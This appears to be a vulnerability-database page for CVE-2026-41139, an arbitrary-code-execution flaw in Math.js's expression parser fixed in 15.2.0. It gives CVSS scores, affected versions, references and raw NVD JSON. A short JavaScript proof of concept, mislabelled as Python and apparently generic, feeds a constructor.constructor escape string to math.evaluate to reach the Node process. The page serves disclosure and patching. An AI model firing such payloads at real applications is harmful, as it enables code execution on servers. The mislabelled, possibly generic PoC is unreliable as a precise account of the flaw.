CVE-2026-41139

Description

Math.js is an extensive math library for JavaScript and Node.js. From version 13.1.0 to before version 15.2.0, arbitrary JavaScript can be executed via the expression parser of mathjs. This issue has been patched in version 15.2.0.

CVSS Details

CVSS Score

8.8

Severity

HIGH

CVSS Vector

CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:mathjs:mathjs:*:*:*:*:*:node.js:*:* - VULNERABLE

Math.js >= 13.1.0, < 15.2.0

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

// PoC for CVE-2026-41139
const math = require('mathjs');

// Malicious payload attempting to execute arbitrary JS
// In vulnerable versions, the parser may allow access to the Function constructor
const maliciousPayload = "constructor.constructor('return process')().exit()";

try {
    console.log("Testing payload...");
    math.evaluate(maliciousPayload);
    console.log("Exploit successful: Process exited.");
} catch (error) {
    console.log("Exploit failed or patched:", error.message);
}

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-41139
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-41139
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-41139/
[4] VulDB https://vuldb.com/cve/CVE-2026-41139
[5] https://github.com/josdejong/mathjs/commit/0aee2f61866e35ffa0aef915221cdf6b026ffdd4
[6] https://github.com/josdejong/mathjs/commit/bcf0da46f0b8577ec03c9ecd7bff8b5c2543a611
[7] https://github.com/josdejong/mathjs/pull/3656
[8] https://github.com/josdejong/mathjs/releases/tag/v15.2.0
[9] https://github.com/josdejong/mathjs/security/advisories/GHSA-5v89-rwgr-qj6g

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-41139", "sourceIdentifier": "[email protected]", "published": "2026-05-07T06:16:04.273", "lastModified": "2026-05-08T17:06:03.997", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Math.js is an extensive math library for JavaScript and Node.js. From version 13.1.0 to before version 15.2.0, arbitrary JavaScript can be executed via the expression parser of mathjs. This issue has been patched in version 15.2.0."}], "metrics": {"cvssMetricV30": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.0", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-915"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:mathjs:mathjs:*:*:*:*:*:node.js:*:*", "versionStartIncluding": "13.1.0", "versionEndExcluding": "15.2.0", "matchCriteriaId": "9F4FB8F3-ED49-4781-80E5-90123FD1A6BE"}]}]}], "references": [{"url": "https://github.com/josdejong/mathjs/commit/0aee2f61866e35ffa0aef915221cdf6b026ffdd4", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/josdejong/mathjs/commit/bcf0da46f0b8577ec03c9ecd7bff8b5c2543a611", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/josdejong/mathjs/pull/3656", "source": "[email protected]", "tags": ["Issue Tracking", "Patch"]}, {"url": "https://github.com/josdejong/mathjs/releases/tag/v15.2.0", "source": "[email protected]", "tags": ["Release Notes"]}, {"url": "https://github.com/josdejong/mathjs/security/advisories/GHSA-5v89-rwgr-qj6g", "source": "[email protected]", "tags": ["Patch", "Vendor Advisory"]}]}}